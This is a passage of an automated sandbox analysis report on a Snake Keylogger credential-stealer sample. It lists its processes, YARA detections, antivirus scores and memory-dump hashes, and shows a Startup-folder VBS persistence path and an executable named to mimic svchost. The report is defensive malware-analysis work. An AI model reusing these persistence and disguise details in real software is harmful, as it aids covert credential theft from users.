                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 68%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:09:07:40
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
                                                                                          Imagebase:0xffdb0000
                                                                                          File size:168'960 bytes
                                                                                          MD5 hash:045451FA238A75305CC26AC982472367
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:09:07:43
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\svcost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcost.exe"
                                                                                          Imagebase:0xa70000
                                                                                          File size:293'066'043 bytes
                                                                                          MD5 hash:A210D6F3E1093395552CE55FA063E011
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:10.1%
                                                                                            Dynamic/Decrypted Code Coverage:69.4%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:62
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph (node list omitted); API calls reached: VirtualProtect, LdrInitializeThunk, SleepEx, VirtualAlloc

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$8$l,$l,$l,$l,$l,$x,$x,$x,$,$,$,$,
                                                                                            • API String ID: 0-649124668
                                                                                            • Opcode ID: f974f66a4e26cad1e2fe3a7e49b069126f5037a7ab48f3832ab2e5ec28284e97
                                                                                            • Instruction ID: a4007f8bc8ee9d7c67aa54796cda372c50ffca566060a164173e02f6478432d5
                                                                                            • Opcode Fuzzy Hash: f974f66a4e26cad1e2fe3a7e49b069126f5037a7ab48f3832ab2e5ec28284e97
                                                                                            • Instruction Fuzzy Hash: B552D575E006288FDB64DF69C890AD9B7B2FF99300F1086EAD509A7355DB70AE81CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0l,$2$H<,$Lk,
                                                                                            • API String ID: 0-1894915305
                                                                                            • Opcode ID: bd5902a5e5de6e1ad4b090bb60f2c236470334522380783ef92e6bde670bdf89
                                                                                            • Instruction ID: 28b718c219218106c6addb044d19c9d245896bdf22c2256fec8e29784a4360bf
                                                                                            • Opcode Fuzzy Hash: bd5902a5e5de6e1ad4b090bb60f2c236470334522380783ef92e6bde670bdf89
                                                                                            • Instruction Fuzzy Hash: 0EE2D574A046288FCB65EF68D894B9DB7F2FB89301F1081E9E809A7395DB745E85CF40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 0813807d1e34dec2a774269fa3b6ced89ca2e910214e588142d0e9dabcc34050
                                                                                            • Instruction ID: a1888ef2ea8bf91d39afe3f47a82c1350302dd715fac1d1bbb66abc2528288ac
                                                                                            • Opcode Fuzzy Hash: 0813807d1e34dec2a774269fa3b6ced89ca2e910214e588142d0e9dabcc34050
                                                                                            • Instruction Fuzzy Hash: 69A21634A102289FDB14DFA4D894BADB7B2FF98304F1491A9E505AB3A5DB70EC41CF60

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$TJ"p$p!p$xb p
                                                                                            • API String ID: 0-2495302866
                                                                                            • Opcode ID: abd776b3ac7c82ec9c6c65e371418a85b56867552ac06b67b4c86b20234cdcdc
                                                                                            • Instruction ID: d5d251d852e54f3c3dcf15c666a849d4648451a8a8cea55b20f44153d43fbf6a
                                                                                            • Opcode Fuzzy Hash: abd776b3ac7c82ec9c6c65e371418a85b56867552ac06b67b4c86b20234cdcdc
                                                                                            • Instruction Fuzzy Hash: 60A2C675A00228CFDB64CF69C884B9DBBB2BF89304F1581E9D509AB362D7319E91CF40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 9759561703539979e6a275d7192a35c91bb820c16879bbfd309e0350ed9be81d
                                                                                            • Instruction ID: 3e0697f6be8921d5ce00124ead5cbdd5d1e0ed929eb0fbf1f47953bcdfe21c4d
                                                                                            • Opcode Fuzzy Hash: 9759561703539979e6a275d7192a35c91bb820c16879bbfd309e0350ed9be81d
                                                                                            • Instruction Fuzzy Hash: 9B620A34A10224CFDB24DF64D894BADB7B2BF98304F1491A5E509AB3A5DB71ED81CF60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 5fd3e0b8378ee758866f89a70212039c9107041515051861b78084b271afddaf
                                                                                            • Instruction ID: d5ab6f64265813949a5598a1d282b7bd97e8868783606b4f629aeb3692015271
                                                                                            • Opcode Fuzzy Hash: 5fd3e0b8378ee758866f89a70212039c9107041515051861b78084b271afddaf
                                                                                            • Instruction Fuzzy Hash: 74220C34A10224CFDB24DF64D894BADB7B2BF98304F1491A5E509AB3A5DB71ED81CF60

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$DYh
                                                                                            • API String ID: 0-1359653725
                                                                                            • Opcode ID: d4821b1deb91625fc9ed6a4497782e8f9f13a41e4ba7e1f59a1a829456d3ea10
                                                                                            • Instruction ID: 07da43915f486f85e28c17133bf724b98e12a6103cb8dd66c0f54e6af4b46143
                                                                                            • Opcode Fuzzy Hash: d4821b1deb91625fc9ed6a4497782e8f9f13a41e4ba7e1f59a1a829456d3ea10
                                                                                            • Instruction Fuzzy Hash: 35427874B047169FCB15CF69C89466FBBF2FB89300F24852AE56AD7390DB34A901CB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `{,$`{,
                                                                                            • API String ID: 0-3935998731
                                                                                            • Opcode ID: cf88988ecee9a16beffdd517138cfc209c041839bddd4e1c98d75eb45c93c524
                                                                                            • Instruction ID: 7f387e7d1657c39f7289b175f1221ef4f8d1463f1be9e903e7c31db143d80746
                                                                                            • Opcode Fuzzy Hash: cf88988ecee9a16beffdd517138cfc209c041839bddd4e1c98d75eb45c93c524
                                                                                            • Instruction Fuzzy Hash: 0A52B274A046288FCB64DF28DD84B9AB7B2FB89301F1085E9D90DA7355DB34AE81CF54

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8`h$Oh$Oh$Oh$Oh
                                                                                            • API String ID: 0-2290478276
                                                                                            • Opcode ID: a5ab3d00c4f6e03359f71b715bf57dfcf26c398c504621b6b3b54976036d54b3
                                                                                            • Instruction ID: e3733c42df767403602915a8e2e564dde61acce5970197e9485ab373ec06a265
                                                                                            • Opcode Fuzzy Hash: a5ab3d00c4f6e03359f71b715bf57dfcf26c398c504621b6b3b54976036d54b3
                                                                                            • Instruction Fuzzy Hash: 14228D35A002249FCB04DFA4E490A6DB7B2EF98314F148979E905EB3A5DB75ED41CBA0

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                            • API String ID: 0-3955841951
                                                                                            • Opcode ID: 35d4d8b89f23bd024ed1c0e8248832d5aeea9c8e022dc40e2af6439633b90779
                                                                                            • Instruction ID: 04c1b015bfcb79ae9855600504a2aa558562b52f05c676055f1960dae964edf2
                                                                                            • Opcode Fuzzy Hash: 35d4d8b89f23bd024ed1c0e8248832d5aeea9c8e022dc40e2af6439633b90779
                                                                                            • Instruction Fuzzy Hash: D8C124363143514FDB14DF68D850A6E7BA6EF84310B2945AAF909CB3E6CB34DC5287A1

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$"$(
                                                                                            • API String ID: 0-2187247857
                                                                                            • Opcode ID: c03d5e03747c25b83dd9b74aeb69de6fd8857f0cb94469477bd0478a16f33375
                                                                                            • Instruction ID: 01e31faa8ff2af66d59d20dad593d0c8beaf520815b97669d6a6cb9c85cee55a
                                                                                            • Opcode Fuzzy Hash: c03d5e03747c25b83dd9b74aeb69de6fd8857f0cb94469477bd0478a16f33375
                                                                                            • Instruction Fuzzy Hash: A921A574A012288FDB65DF28E859BDABBF1BF5A304F5041E9D50EA7260DB305E90CF51

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$O$,
                                                                                            • API String ID: 0-3239620795
                                                                                            • Opcode ID: 6aaeae97cd83c21980968e7a1fca6cfe8866ba2df6821e0d67c56c0c1d4aeaaa
                                                                                            • Instruction ID: 67d9262ccabc8419ae3a5aadcaac89115ec9894ed41979f9044a5dd59d4f50d9
                                                                                            • Opcode Fuzzy Hash: 6aaeae97cd83c21980968e7a1fca6cfe8866ba2df6821e0d67c56c0c1d4aeaaa
                                                                                            • Instruction Fuzzy Hash: 9AE0D87190524CAFD700EBB08921B5E37A4DB02300F1001F5D808D7291EE351E248B96

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$d
                                                                                            • API String ID: 0-1322973597
                                                                                            • Opcode ID: e1db09f0f2fdacad9378a14b0a936369b9dae790b3e72a37045259ffa841d545
                                                                                            • Instruction ID: fc02acae31588ce5fd775406a598ae7164a3ce63ca9a2927bb9add1a43b50863
                                                                                            • Opcode Fuzzy Hash: e1db09f0f2fdacad9378a14b0a936369b9dae790b3e72a37045259ffa841d545
                                                                                            • Instruction Fuzzy Hash: 82D16A35600706CFC724CF28C584A6AB7F2FF89310B558969D45A9BBA2DB30FC56CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$H!p
                                                                                            • API String ID: 0-1960402415
                                                                                            • Opcode ID: cae131debbf6024281174e817fd1432e740c6f4daa07e77ab6fa44c96739e1c4
                                                                                            • Instruction ID: 80741d84002919040686a96e4fc063a92ca6f9a5a5a4b5a33413da3e5e2fe412
                                                                                            • Opcode Fuzzy Hash: cae131debbf6024281174e817fd1432e740c6f4daa07e77ab6fa44c96739e1c4
                                                                                            • Instruction Fuzzy Hash: 2751AA347002108FD719AF34E865A2E77A3EF99304B254669E506DB3A5CF35EC02CBA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$^
                                                                                            • API String ID: 0-3830990845
                                                                                            • Opcode ID: c6085d80f0b6c1d82e975a36b3de4ff0bb1e0506464dcd15fde1ffce90774586
                                                                                            • Instruction ID: 4cdbe4016e0ecdb04dba7047aa257f17633629a73b0074f8e866c2a8f6b441e4
                                                                                            • Opcode Fuzzy Hash: c6085d80f0b6c1d82e975a36b3de4ff0bb1e0506464dcd15fde1ffce90774586
                                                                                            • Instruction Fuzzy Hash: 9441CF74A01668CFDF21EFA0C988BDDBBF1BB59301F2081A9D409AB394DB745A85CF54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: <`,$T
                                                                                            • API String ID: 0-896310870
                                                                                            • Opcode ID: 7f1c85b59b1bda381f1cc2f10b35533dd4238f3480fa41b1f9d8088ba1bef6bf
                                                                                            • Instruction ID: d5794ddacaf83bbc853312efff025c50f30acabac91149676344378f6380ccdd
                                                                                            • Opcode Fuzzy Hash: 7f1c85b59b1bda381f1cc2f10b35533dd4238f3480fa41b1f9d8088ba1bef6bf
                                                                                            • Instruction Fuzzy Hash: 0E41E374A08229CFCB64DF68D958AADB7F1FF49300F0044EAE959A7291C7746E848F15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$/
                                                                                            • API String ID: 0-2439032044
                                                                                            • Opcode ID: feee843a6a520fec16b84530506aeb893ab1feaf0b03224ee177d46a10ebb856
                                                                                            • Instruction ID: fbae57138525613f10de0727471adc2426f0c3a36bb162a9e322048f036d1207
                                                                                            • Opcode Fuzzy Hash: feee843a6a520fec16b84530506aeb893ab1feaf0b03224ee177d46a10ebb856
                                                                                            • Instruction Fuzzy Hash: 2B21343590129ADBCB20DF58D844BDCB7B1FB4A305F0081EAE90DB3210C774AA86CF44
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$"
                                                                                            • API String ID: 0-3793174398
                                                                                            • Opcode ID: 0e8d01cfdd927a268b4cc7970d2b6bd28eb7cad68803960b1c06873378f2c60e
                                                                                            • Instruction ID: 492eb24b93f784cdf2f2db3ffe6ba8e2c1df1ae7cb0c2a64e13fd42b00babfbb
                                                                                            • Opcode Fuzzy Hash: 0e8d01cfdd927a268b4cc7970d2b6bd28eb7cad68803960b1c06873378f2c60e
                                                                                            • Instruction Fuzzy Hash: 0A21B274A012288FDB61DF28E858BDABBF1BF4A300F5045E9E50EA7260DB305E80CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$O
                                                                                            • API String ID: 0-2467081800
                                                                                            • Opcode ID: d841508471476abf6394e631a7d9f48f62b0bdbfe156a90d657cadbb434efe20
                                                                                            • Instruction ID: 387de835781f5fd52c6ac0fb793679cdd1207436c9c6b21dfdfa99bdaab5f82e
                                                                                            • Opcode Fuzzy Hash: d841508471476abf6394e631a7d9f48f62b0bdbfe156a90d657cadbb434efe20
                                                                                            • Instruction Fuzzy Hash: FCF01C74E05208EFCB40DFA8D5556ADBBF4EB48300F10C1E98C1997341EA35AE02DF85
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A7DDE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 305b12fa2c9a5c28c65bcc035da438526228382d5b739593bb581d4cbbb54571
                                                                                            • Instruction ID: 80dec76dbbbf63ff7723a199b045f65c5f692a2eec70bd1cddd678cc7da55064
                                                                                            • Opcode Fuzzy Hash: 305b12fa2c9a5c28c65bcc035da438526228382d5b739593bb581d4cbbb54571
                                                                                            • Instruction Fuzzy Hash: 663197B8D012189FDF14CFA9D984AEEFBB5BF49310F24942AE814BB210D735A945CF94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 6ccf93fa8d8e4ac7e395e1884086eba1555514f835df53d27a9603755f45e4aa
                                                                                            • Instruction ID: 827169ff06d59c0046a221a09f9864368ea62e2c94afff67575ed7f89bb606a1
                                                                                            • Opcode Fuzzy Hash: 6ccf93fa8d8e4ac7e395e1884086eba1555514f835df53d27a9603755f45e4aa
                                                                                            • Instruction Fuzzy Hash: 9F31DBB5D012189FDF14CFA9D984AEEFBF5AF49310F24942AE804B7250C735A945CFA4
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 006142BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488752664.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_610000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 97226bdb261210fbd32edc7eca0350cf22434356998fac8c1c1ae92a7c6f69b3
                                                                                            • Instruction ID: cff2cc817371e1dc8808d07ff4ea5d601c32bd4014eefbecc3265b993a4dd2df
                                                                                            • Opcode Fuzzy Hash: 97226bdb261210fbd32edc7eca0350cf22434356998fac8c1c1ae92a7c6f69b3
                                                                                            • Instruction Fuzzy Hash: B7F0906015A3D45FE31297614C6DFDA3F749B43310F2880DAE0448B5E3C6785889C772
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: |*6
                                                                                            • API String ID: 0-2560423571
                                                                                            • Opcode ID: 4eae18a81895ee321a4106f8f14269ad13a3f190de36716ff51290bd207e3cc9
                                                                                            • Instruction ID: 4e05ebcc6ae6ea8dc5785d6fffd66cea3b5f261199a9cf3b75f1949cb1200cfc
                                                                                            • Opcode Fuzzy Hash: 4eae18a81895ee321a4106f8f14269ad13a3f190de36716ff51290bd207e3cc9
                                                                                            • Instruction Fuzzy Hash: 56B12874F04258CFDF64DFA4E894BADBBF2EB49304F1080A9E419AB295CB745A85CF11
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p
                                                                                            • API String ID: 0-4019288291
                                                                                            • Opcode ID: 37ede287a25105e6bdd5b5645ccf55e3994bd3bfd1a8cc6304e12e6f50d7e953
                                                                                            • Instruction ID: d4559c3ea8722530edeba639194103df2cd79fc45c31e14c5dfc61d9fbc0557e
                                                                                            • Opcode Fuzzy Hash: 37ede287a25105e6bdd5b5645ccf55e3994bd3bfd1a8cc6304e12e6f50d7e953
                                                                                            • Instruction Fuzzy Hash: AB71D974E04248DFDB04EFA8E5986AEBBF2FB99300F208069E415B7398DB785945CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p
                                                                                            • API String ID: 0-4019288291
                                                                                            • Opcode ID: 95ce4c60fc7f7313968c925a03f54d7d868477882e9973aeb0dbeb9cdd9c66f3
                                                                                            • Instruction ID: 33360abb45737c60232730a1acbd24eaa1c562e66b737544495f71d2c0ab59c7
                                                                                            • Opcode Fuzzy Hash: 95ce4c60fc7f7313968c925a03f54d7d868477882e9973aeb0dbeb9cdd9c66f3
                                                                                            • Instruction Fuzzy Hash: 6471D874E04248DFDB04EFA8E5986AEBBF2FB99300F208069E415B7398DB745945CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p
                                                                                            • API String ID: 0-1059414960
                                                                                            • Opcode ID: 3001c694b831265dc3e2b9d0841a9fe5bd8846cc9f23ff31c870ac67d74879cf
                                                                                            • Instruction ID: 99297e4b38754218fa43eed63530290278516e6753bbdf0d72ea1f1c6dac608f
                                                                                            • Opcode Fuzzy Hash: 3001c694b831265dc3e2b9d0841a9fe5bd8846cc9f23ff31c870ac67d74879cf
                                                                                            • Instruction Fuzzy Hash: 4251C3357002108FDB14DF69D890A5EBBF2FF89311B15816AEA05CB362CB71EC01CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p
                                                                                            • API String ID: 0-2763268518
                                                                                            • Opcode ID: 2c0ff86611b3b707cd19b7e8f1a08153c55c532346a17bbb293c72a9468664e0
                                                                                            • Instruction ID: 976cbd3cb86f90e7788b2807b3cd6212aa307515a994d7df55ce96d671762393
